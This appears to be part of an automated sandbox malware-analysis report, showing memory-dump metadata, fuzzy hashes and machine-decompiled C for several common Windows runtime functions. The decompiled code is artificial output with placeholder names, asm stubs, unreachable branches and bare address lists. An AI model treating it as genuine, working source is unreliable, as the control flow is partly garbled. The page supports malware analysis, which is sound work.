0x051013ac
0x051013b2
0x051013b5
0x051013bc
0x051013bf
0x051013c2
0x051013c5
0x051013c8
0x051013cb
0x051013ce
0x051013d1
0x051013d4
0x051013d7
0x051013da
0x051013dd
0x051013e0
0x051013e3
0x051013e6
0x051013e9
0x051013f6
0x05101400
0x05101400
0x050c8f08
0x050c8f32

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20cbca7e6e69b183202a92d626077e497277c8f80a4ff71bf54b5afae3ceb146
Instruction ID: cad6552162742d586ec79f2fbd51d914a1aa345ab4f9ebc6ea72e9a8ca689c44
Opcode Fuzzy Hash: 20cbca7e6e69b183202a92d626077e497277c8f80a4ff71bf54b5afae3ceb146
Instruction Fuzzy Hash: 8C41B1B1D0021C9FDB20CFAAE981AADFBF5FB48310F5081AEE509A7241DB745A84CF50

Uniqueness

Uniqueness Score: -1.00%

Function 050BE730, Relevance: .1, Instructions: 89
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E050BE730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
				intOrPtr* _v0;
				signed char _v4;
				signed int _v8;
				void* __ecx;
				void* __ebp;
				void* _t37;
				intOrPtr _t38;
				signed int _t44;
				signed char _t52;
				void* _t54;
				intOrPtr* _t56;
				void* _t58;
				char* _t59;
				signed int _t62;

				_t58 = __edx;
				_push(0);
				_push(4);
				_push( &_v8);
				_push(0x24);
				_push(0xffffffff);
				if(E050C9670() < 0) {
					L050DDF30(_t54, _t58, _t35);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t54);
					_t52 = _v4;
					if(_t52 > 8) {
						_t37 = 0xc0000078;
					} else {
						_t38 =  *0x5177b9c; // 0x0
						_t62 = _t52 & 0x000000ff;
						_t59 = L050A4620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
						if(_t59 == 0) {
							_t37 = 0xc0000017;
						} else {
							_t56 = _v0;
							 *(_t59 + 1) = _t52;
							 *_t59 = 1;
							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
							_t44 = _t62 - 1;
							if(_t44 <= 7) {
								switch( *((intOrPtr*)(_t44 * 4 +  &M050BE810))) {
									case 0:
										L6:
										 *((intOrPtr*)(_t59 + 8)) = _a8;
										goto L7;
									case 1:
										L13:
										 *((intOrPtr*)(__edx + 0xc)) = _a12;
										goto L6;
									case 2:
										L12:
										 *((intOrPtr*)(__edx + 0x10)) = _a16;
										goto L13;
									case 3:
										L11:
										 *((intOrPtr*)(__edx + 0x14)) = _a20;
										goto L12;
									case 4:
										L10:
										 *((intOrPtr*)(__edx + 0x18)) = _a24;
										goto L11;
									case 5:
										L9:
										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
										goto L10;
									case 6:
										L17:
										 *((intOrPtr*)(__edx + 0x20)) = _a32;
										goto L9;
									case 7:
										 *((intOrPtr*)(__edx + 0x24)) = _a36;
										goto L17;
								}
							}
							L7:
							 *_a40 = _t59;
							_t37 = 0;
						}
					}
					return _t37;
				} else {
					_push(0x20);
					asm("ror eax, cl");
					return _a4 ^ _v8;
				}
			}

0x050be730
0x050be736
0x050be738
0x050be73d
0x050be73e
0x050be740
0x050be749
0x050be765
0x050be76a
0x050be76b
0x050be76c
0x050be76d
0x050be76e
0x050be76f
0x050be775
0x050be777
0x050be77e
0x050fb675
0x050be784
0x050be784
0x050be789
0x050be7a8
0x050be7ac
0x050be807
0x050be7ae
0x050be7ae
0x050be7b1
0x050be7b4
0x050be7b9
0x050be7c0
0x050be7c4
0x050be7ca
0x050be7cc
0x00000000
0x050be7d3
0x050be7d6
0x00000000
0x00000000
0x050be7ff
0x050be802
0x00000000
0x00000000
0x050be7f9
0x050be7fc
0x00000000
0x00000000
0x050be7f3
0x050be7f6
0x00000000
0x00000000
0x050be7ed
0x050be7f0
0x00000000
0x00000000
0x050be7e7
0x050be7ea
0x00000000
0x00000000
0x050fb685
0x050fb688
0x00000000
0x00000000
0x050fb682
0x00000000
0x00000000
0x050be7cc
0x050be7d9
0x050be7dc
0x050be7de
0x050be7de
0x050be7ac
0x050be7e4
0x050be74b
0x050be751
0x050be759
0x050be761
0x050be761

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 554fd681cb04b9f10e3d6699b3b73c6df84f64bd2bbd21a723b6b504058dae5b
Instruction ID: e1dccb507e19fc3d17752449520a395de2aa5a143ab961accb38402fa9cf3d52
Opcode Fuzzy Hash: 554fd681cb04b9f10e3d6699b3b73c6df84f64bd2bbd21a723b6b504058dae5b
Instruction Fuzzy Hash: FD318F75A54249EFE744CF58D985BDABBE8FB09314F1482A6F908CB341D671E880CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 050BBC2C, Relevance: .1, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E050BBC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				intOrPtr _t22;
				intOrPtr* _t41;
				intOrPtr _t51;

				_t51 =  *0x5176100; // 0x33
				_v12 = __edx;
				_v8 = __ecx;
				if(_t51 >= 0x800) {
					L12:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t22 = _t51;
					asm("lock cmpxchg [ecx], edx");
					if(_t51 == _t22) {
						break;
					}
					_t51 = _t22;
					if(_t22 < 0x800) {
						continue;
					}
					goto L12;
				}
				E050A2280(0xd, 0x1974f1a0);
				_t41 =  *0x51760f8; // 0x0
				if(_t41 != 0) {
					 *0x51760f8 =  *_t41;
					 *0x51760fc =  *0x51760fc + 0xffff;
				}
				E0509FFB0(_t41, 0x800, 0x1974f1a0);
				if(_t41 != 0) {
					L6:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
					do {
						asm("lock xadd [0x51760f0], ax");
						 *((short*)(_t41 + 0x34)) = 1;
					} while (1 == 0);
					goto L8;
				} else {
					_t41 = L050A4620(0x5176100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
					if(_t41 == 0) {
						L11:
						asm("lock dec dword [0x5176100]");
						L8:
						return _t41;
					}
					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
					if(_t41 == 0) {
						goto L11;
					}
					goto L6;
				}
			}

0x050bbc36
0x050bbc42
0x050bbc45
0x050bbc4a
0x050bbd35
0x00000000
0x00000000
0x00000000
0x00000000
0x050bbc50
0x050bbc50
0x050bbc58
0x050bbc5a
0x050bbc60
0x00000000
0x00000000
0x050fa4f2
0x050fa4f6
0x00000000
0x00000000
0x00000000
0x050fa4fc
0x050bbc79
0x050bbc7e
0x050bbc86
0x050bbd16
0x050bbd20
0x050bbd20
0x050bbc8d
0x050bbc94
0x050bbcbd
0x050bbcca
0x050bbccb
0x050bbccc
0x050bbccd
0x050bbcce
0x050bbcd4
0x050bbcea
0x050bbcee
0x050bbcf2
0x050bbd00
0x050bbd04
0x00000000
0x050bbc96
0x050bbcab
0x050bbcaf
0x050bbd2c
0x050bbd2c
0x050bbd09
0x00000000
0x050bbd09
0x050bbcb1
0x050bbcb5
0x050bbcbb
0x00000000
0x00000000
0x00000000
0x050bbcbb

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e430a885cf9e35aa2df7a3b74a688c46949a8758e703a4e4a8ed283a056c849
Instruction ID: 0a348d0a29a32bf34d0580a93bf5e84ed8bde06a60320f5ba00149bc734713c5
Opcode Fuzzy Hash: 6e430a885cf9e35aa2df7a3b74a688c46949a8758e703a4e4a8ed283a056c849
Instruction Fuzzy Hash: E931FF36A10A199FEB51DF58E4C17EE7BB5FB58310F000078ED49EB241EBB8D9458B80

Uniqueness

Uniqueness Score: -1.00%

Function 05089100, Relevance: .1, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E05089100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t53;
				signed int _t56;
				signed int* _t60;
				signed int _t63;
				signed int _t66;
				signed int _t69;
				void* _t70;
				intOrPtr* _t72;
				void* _t78;
				void* _t79;
				signed int _t80;
				intOrPtr _t82;
				void* _t85;
				void* _t88;
				void* _t89;

				_t84 = __esi;
				_t70 = __ecx;
				_t68 = __ebx;
				_push(0x2c);
				_push(0x515f6e8);
				E050DD0E8(__ebx, __edi, __esi);
				 *((char*)(_t85 - 0x1d)) = 0;
				_t82 =  *((intOrPtr*)(_t85 + 8));
				if(_t82 == 0) {
					L4:
					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
						E051588F5(_t68, _t70, _t78, _t82, _t84, __eflags);
					}
					L5:
					return E050DD130(_t68, _t82, _t84);
				}
				_t88 = _t82 -  *0x51786c0; // 0x33607b0
				if(_t88 == 0) {
					goto L4;
				}
				_t89 = _t82 -  *0x51786b8; // 0x0
				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L4;
				} else {
					E050A2280(_t82 + 0xe0, _t82 + 0xe0);
					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
					__eflags =  *((char*)(_t82 + 0xe5));
					if(__eflags != 0) {
						E051588F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
						goto L12;
					} else {
						__eflags =  *((char*)(_t82 + 0xe4));
						if( *((char*)(_t82 + 0xe4)) == 0) {
							 *((char*)(_t82 + 0xe4)) = 1;
							_push(_t82);
							_push( *((intOrPtr*)(_t82 + 0x24)));
							E050CAFD0();
						}
						while(1) {
							_t60 = _t82 + 8;
							 *(_t85 - 0x2c) = _t60;
							_t68 =  *_t60;
							_t80 = _t60[1];
							 *(_t85 - 0x28) = _t68;
							 *(_t85 - 0x24) = _t80;
							while(1) {
								L10:
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t84 = _t68;
								 *(_t85 - 0x30) = _t80;
								 *(_t85 - 0x24) = _t80 - 1;
								asm("lock cmpxchg8b [edi]");
								_t68 = _t84;
								 *(_t85 - 0x28) = _t68;
								 *(_t85 - 0x24) = _t80;
								__eflags = _t68 - _t84;
								_t82 =  *((intOrPtr*)(_t85 + 8));
								if(_t68 != _t84) {
									continue;
								}
								__eflags = _t80 -  *(_t85 - 0x30);
								if(_t80 !=  *(_t85 - 0x30)) {
									continue;
								}
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t63 = 0;
								 *(_t85 - 0x34) = 0;
								_t84 = 0;
								__eflags = 0;
								while(1) {
									 *(_t85 - 0x3c) = _t84;
									__eflags = _t84 - 3;
									if(_t84 >= 3) {
										break;
									}
									__eflags = _t63;
									if(_t63 != 0) {
										L40:
										_t84 =  *_t63;
										__eflags = _t84;
										if(_t84 != 0) {
											_t84 =  *(_t84 + 4);
											__eflags = _t84;
											if(_t84 != 0) {
												 *0x517b1e0(_t63, _t82);
												 *_t84();
											}
										}
										do {
											_t60 = _t82 + 8;
											 *(_t85 - 0x2c) = _t60;
											_t68 =  *_t60;
											_t80 = _t60[1];
											 *(_t85 - 0x28) = _t68;
											 *(_t85 - 0x24) = _t80;
											goto L10;
										} while (_t63 == 0);
										goto L40;
									}
									_t69 = 0;
									__eflags = 0;
									while(1) {
										 *(_t85 - 0x38) = _t69;
										__eflags = _t69 -  *0x51784c0;
										if(_t69 >=  *0x51784c0) {
											break;
										}
										__eflags = _t63;
										if(_t63 != 0) {
											break;
										}
										_t66 = E05159063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
										__eflags = _t66;
										if(_t66 == 0) {
											_t63 = 0;
											__eflags = 0;
										} else {
											_t63 = _t66 + 0xfffffff4;
										}
										 *(_t85 - 0x34) = _t63;
										_t69 = _t69 + 1;
									}
									_t84 = _t84 + 1;
								}
								__eflags = _t63;
							}
							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
							 *((char*)(_t82 + 0xe5)) = 1;
							 *((char*)(_t85 - 0x1d)) = 1;
							L12:
							 *(_t85 - 4) = 0xfffffffe;
							E0508922A(_t82);
							_t53 = E050A7D50();
							__eflags = _t53;
							if(_t53 != 0) {
								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							} else {
								_t56 = 0x7ffe0386;
							}
							__eflags =  *_t56;
							if( *_t56 != 0) {
								_t56 = E05158B58(_t82);
							}
							__eflags =  *((char*)(_t85 - 0x1d));
							if( *((char*)(_t85 - 0x1d)) != 0) {
								__eflags = _t82 -  *0x51786c0; // 0x33607b0
								if(__eflags != 0) {
									__eflags = _t82 -  *0x51786b8; // 0x0
									if(__eflags == 0) {
										_t79 = 0x51786bc;
										_t72 = 0x51786b8;
										goto L18;
									}
									__eflags = _t56 | 0xffffffff;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										E05089240(_t68, _t82, _t82, _t84, __eflags);
									}
								} else {
									_t79 = 0x51786c4;
									_t72 = 0x51786c0;
									L18:
									E050B9B82(_t68, _t72, _t79, _t82, _t84, __eflags);
								}
							}
							goto L5;
						}
					}
				}
			}

0x05089100
0x05089100
0x05089100
0x05089100
0x05089102
0x05089107
0x0508910c
0x05089110
0x05089115
0x05089136
0x05089143
0x050e37e4
0x050e37e4
0x05089149
0x0508914e
0x0508914e
0x05089117
0x0508911d
0x00000000
0x00000000
0x0508911f
0x05089125
0x00000000
0x05089151
0x05089158
0x0508915d
0x05089161
0x05089168
0x050e3715
0x00000000
0x0508916e
0x0508916e
0x05089175
0x05089177
0x0508917e
0x0508917f
0x05089182
0x05089182
0x05089187
0x05089187
0x0508918a
0x0508918d
0x0508918f
0x05089192
0x05089195
0x05089198
0x05089198
0x05089198
0x0508919a
0x00000000
0x00000000
0x050e371f
0x050e3721
0x050e3727
0x050e372f
0x050e3733
0x050e3735
0x050e3738
0x050e373b
0x050e373d
0x050e3740
0x00000000
0x00000000
0x050e3746
0x050e3749
0x00000000
0x00000000
0x050e374f
0x050e3751
0x00000000
0x00000000
0x050e3757
0x050e3759
0x050e375c
0x050e375c
0x050e375e
0x050e375e
0x050e3761
0x050e3764
0x00000000
0x00000000
0x050e3766
0x050e3768
0x050e37a3
0x050e37a3
0x050e37a5
0x050e37a7
0x050e37ad
0x050e37b0
0x050e37b2
0x050e37bc
0x050e37c2
0x050e37c2
0x050e37b2
0x05089187
0x05089187
0x0508918a
0x0508918d
0x0508918f
0x05089192
0x05089195
0x00000000
0x05089195
0x00000000
0x05089187
0x050e376a
0x050e376a
0x050e376c
0x050e376c
0x050e376f
0x050e3775
0x00000000
0x00000000
0x050e3777
0x050e3779
0x00000000
0x00000000
0x050e3782
0x050e3787
0x050e3789
0x050e3790
0x050e3790
0x050e378b
0x050e378b
0x050e378b
0x050e3792
0x050e3795
0x050e3795
0x050e3798
0x050e3798
0x050e379b
0x050e379b
0x050891a3
0x050891a9
0x050891b0
0x050891b4
0x050891b4
0x050891bb
0x050891c0
0x050891c5
0x050891c7
0x050e37da
0x050891cd
0x050891cd
0x050891cd
0x050891d2
0x050891d5
0x05089239
0x05089239
0x050891d7
0x050891db
0x050891e1
0x050891e7
0x050891fd
0x05089203
0x0508921e
0x05089223
0x00000000
0x05089223
0x05089205
0x05089208
0x0508920c
0x05089214
0x05089214
0x050891e9
0x050891e9
0x050891ee
0x050891f3
0x050891f3
0x050891f3
0x050891e7
0x00000000
0x050891db
0x05089187
0x05089168

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13d78d6a40a4791b307e63223891c258eb9a6459c6750f3f272d42d9aca189c7
Instruction ID: 6a9d6ddb1e0132572681d41e816b68174b7e5a2f23b859e474782314bb6feb74
Opcode Fuzzy Hash: 13d78d6a40a4791b307e63223891c258eb9a6459c6750f3f272d42d9aca189c7
Instruction Fuzzy Hash: 7A31AE75A09245EFDF61FB68E188FBCBBF2BB48320F288959D49567241C334B980CB51

Uniqueness

Uniqueness Score: -1.00%

Function 050B1DB5, Relevance: .1, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E050B1DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				void* _t22;
				char _t23;
				void* _t36;
				intOrPtr _t42;
				intOrPtr _t43;

				_v12 = __ecx;
				_t43 = 0;
				_v20 = __edx;
				_t42 =  *__edx;
				 *__edx = 0;
				_v16 = _t42;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(6);
				_push(0);
				_push(__ecx);
				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
				_push(_t36);
				_t22 = E050AF460();
				if(_t22 < 0) {
					if(_t22 == 0xc0000023) {
						goto L1;
					}
					L3:
					return _t43;
				}
				L1:
				_t23 = _v8;
				if(_t23 != 0) {
					_t38 = _a4;
					if(_t23 >  *_a4) {
						_t42 = L050A4620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
						if(_t42 == 0) {
							goto L3;
						}
						_t23 = _v8;
					}
					_push( &_v8);
					_push(_t23);
					_push(_t42);
					_push(6);
					_push(_t43);
					_push(_v12);
					_push(_t36);
					if(E050AF460() < 0) {
						if(_t42 != 0 && _t42 != _v16) {
							L050A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
						}
						goto L3;
					}
					 *_v20 = _t42;
					 *_a4 = _v8;
				}
				_t43 = 1;
				goto L3;
			}

0x050b1dc2
0x050b1dc5
0x050b1dc7
0x050b1dcc
0x050b1dce
0x050b1dd6
0x050b1ddf
0x050b1de0
0x050b1de1
0x050b1de5
0x050b1de8
0x050b1def
0x050b1df0
0x050b1df6
0x050b1df7
0x050b1dfe
0x050b1e1a
0x00000000
0x00000000
0x050b1e0b
0x050b1e12
0x050b1e12
0x050b1e00
0x050b1e00
0x050b1e05
0x050b1e1e
0x050b1e23
0x050f570f
0x050f5713
0x00000000
0x00000000
0x050f5719
0x050f5719
0x050b1e2c
0x050b1e2d
0x050b1e2e
0x050b1e2f
0x050b1e31
0x050b1e32
0x050b1e35
0x050b1e3d
0x050f5723
0x050f573d
0x050f573d
0x00000000
0x050f5723
0x050b1e49
0x050b1e4e
0x050b1e4e
0x050b1e09
0x00000000

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
Instruction ID: 2a511e9534b9f39dcf61e213e177f17161a519a334c24540ed8365e4518682f6
Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
Instruction Fuzzy Hash: B6219F32600219FBE721CF99ED94EEEBBBDFF89640F114055E91197210D6B1AE01CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 050A0050, Relevance: .1, Instructions: 81
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E050A0050(void* __ecx) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t30;
				intOrPtr* _t31;
				signed int _t34;
				void* _t40;
				void* _t41;
				signed int _t44;
				intOrPtr _t47;
				signed int _t58;
				void* _t59;
				void* _t61;
				void* _t62;
				signed int _t64;

				_push(__ecx);
				_v8 =  *0x517d360 ^ _t64;
				_t61 = __ecx;
				_t2 = _t61 + 0x20; // 0x20
				E050B9ED0(_t2, 1, 0);
				_t52 =  *(_t61 + 0x8c);
				_t4 = _t61 + 0x8c; // 0x8c
				_t40 = _t4;
				do {
					_t44 = _t52;
					_t58 = _t52 & 0x00000001;
					_t24 = _t44;
					asm("lock cmpxchg [ebx], edx");
					_t52 = _t44;
				} while (_t52 != _t44);
				if(_t58 == 0) {
					L7:
					_pop(_t59);
					_pop(_t62);
					_pop(_t41);
					return E050CB640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
				}
				asm("lock xadd [esi], eax");
				_t47 =  *[fs:0x18];
				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t30 != 0) {
					if( *_t30 == 0) {
						goto L4;
					}
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					L5:
					if( *_t31 != 0) {
						_t18 = _t61 + 0x78; // 0x78
						E05158A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
					}
					_t52 =  *(_t61 + 0x5c);
					_t11 = _t61 + 0x78; // 0x78
					_t34 = E050B9702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
					_t24 = _t34 | 0xffffffff;
					asm("lock xadd [esi], eax");
					if((_t34 | 0xffffffff) == 0) {
						 *0x517b1e0(_t61);
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
					}
					goto L7;
				}
				L4:
				_t31 = 0x7ffe0386;
				goto L5;
			}

0x050a0055
0x050a005d
0x050a0062
0x050a006c
0x050a006f
0x050a0074
0x050a007a
0x050a007a
0x050a0080
0x050a0080
0x050a0087
0x050a008d
0x050a008f
0x050a0093
0x050a0095
0x050a009b
0x050a00f8
0x050a00fb
0x050a00fc
0x050a00ff
0x050a0108
0x050a0108
0x050a00a2
0x050a00a6
0x050a00b3
0x050a00bc
0x050a00c5
0x050a00ca
0x050ec01e
0x00000000
0x00000000
0x050ec02d
0x050a00d5
0x050a00d9
0x050ec03d
0x050ec046
0x050ec046
0x050a00df
0x050a00e2
0x050a00ea
0x050a00ef
0x050a00f2
0x050a00f6
0x050a0111
0x050a0117
0x050a0117
0x00000000
0x050a00f6
0x050a00d0
0x050a00d0
0x00000000

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3be507082d382678949b923dd746652276728817420e4958f49d6ce4cf3a639b
Instruction ID: e2bac01af29c982538acd17e688eb705b5e9e4c52219d12053ee351044ab2e2c
Opcode Fuzzy Hash: 3be507082d382678949b923dd746652276728817420e4958f49d6ce4cf3a639b
Instruction Fuzzy Hash: 1F31BF32601B08CFD762CF68D858F9AB3E6FF88714F14456DE49687690EB75AC01CB50

Uniqueness

Uniqueness Score: -1.00%

Function 05106C0A, Relevance: .1, Instructions: 79
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E05106C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
				signed short* _v8;
				signed char _v12;
				void* _t22;
				signed char* _t23;
				intOrPtr _t24;
				signed short* _t44;
				void* _t47;
				signed char* _t56;
				signed char* _t58;

				_t48 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t44 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t22 = E050A7D50();
				_t58 = 0x7ffe0384;
				if(_t22 == 0) {
					_t23 = 0x7ffe0384;
				} else {
					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				}
				if( *_t23 != 0) {
					_t24 =  *0x5177b9c; // 0x0
					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
					_t23 = L050A4620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
					_t56 = _t23;
					if(_t56 != 0) {
						_t56[0x24] = _a4;
						_t56[0x28] = _a8;
						_t56[6] = 0x1420;
						_t56[0x20] = _v12;
						_t14 =  &(_t56[0x2c]); // 0x2c
						E050CF3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
						if(E050A7D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						_push(_t56);
						_push(_t47 - 0x20);
						_push(0x402);
						_push( *_t58 & 0x000000ff);
						E050C9AE0();
						_t23 = L050A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
					}
				}
				return _t23;
			}

0x05106c0a
0x05106c0f
0x05106c10
0x05106c13
0x05106c15
0x05106c19
0x05106c1c
0x05106c21
0x05106c28
0x05106c3a
0x05106c2a
0x05106c33
0x05106c33
0x05106c3f
0x05106c48
0x05106c4d
0x05106c60
0x05106c65
0x05106c69
0x05106c73
0x05106c79
0x05106c7f
0x05106c86
0x05106c90
0x05106c94
0x05106ca6
0x05106cb2
0x05106cbd
0x05106cbd
0x05106cc3
0x05106cc7
0x05106ccb
0x05106cd0
0x05106cd1
0x05106ce2
0x05106ce2
0x05106c69
0x05106ced

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f2e6c16f0657d90911b50bc50dda90e8696787644f76ed52938829e12e98616
Instruction ID: 948d0b80bf9fc32a2393b817c1a080568861590ece0421f44b2590ae981c6e1b
Opcode Fuzzy Hash: 6f2e6c16f0657d90911b50bc50dda90e8696787644f76ed52938829e12e98616
Instruction Fuzzy Hash: 8221AB72A00644AFC715DBA8E984E6AB7B8FF48710F0440A9F805D7791D774ED10CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 050C90AF, Relevance: .1, Instructions: 76
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E050C90AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr* _v0;
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v36;
				void* _t38;
				intOrPtr _t41;
				void* _t44;
				signed int _t45;
				intOrPtr* _t49;
				signed int _t57;
				signed int _t58;
				intOrPtr* _t59;
				void* _t62;
				void* _t63;
				void* _t65;
				void* _t66;
				signed int _t69;
				intOrPtr* _t70;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				char _t74;

				_t65 = __edx;
				_t57 = _a4;
				_t32 = __ecx;
				_v8 = __edx;
				_t3 = _t32 + 0x14c; // 0x14c
				_t70 = _t3;
				_v16 = __ecx;
				_t72 =  *_t70;
				while(_t72 != _t70) {
					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
						L24:
						_t72 =  *_t72;
						continue;
					}
					_t30 = _t72 + 0x10; // 0x10
					if(E050DD4F0(_t30, _t65, _t57) == _t57) {
						return 0xb7;
					}
					_t65 = _v8;
					goto L24;
				}
				_t61 = _t57;
				_push( &_v12);
				_t66 = 0x10;
				if(E050BE5E0(_t57, _t66) < 0) {
					return 0x216;
				}
				_t73 = L050A4620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
				if(_t73 == 0) {
					_t38 = 0xe;
					return _t38;
				}
				_t9 = _t73 + 0x10; // 0x10
				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
				E050CF3E0(_t9, _v8, _t57);
				_t41 =  *_t70;
				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
					_t62 = 3;
					asm("int 0x29");
					_push(_t62);
					_push(_t57);
					_push(_t73);
					_push(_t70);
					_t71 = _t62;
					_t74 = 0;
					_v36 = 0;
					_t63 = E050BA2F0(_t62, _t71, 1, 6,  &_v36);
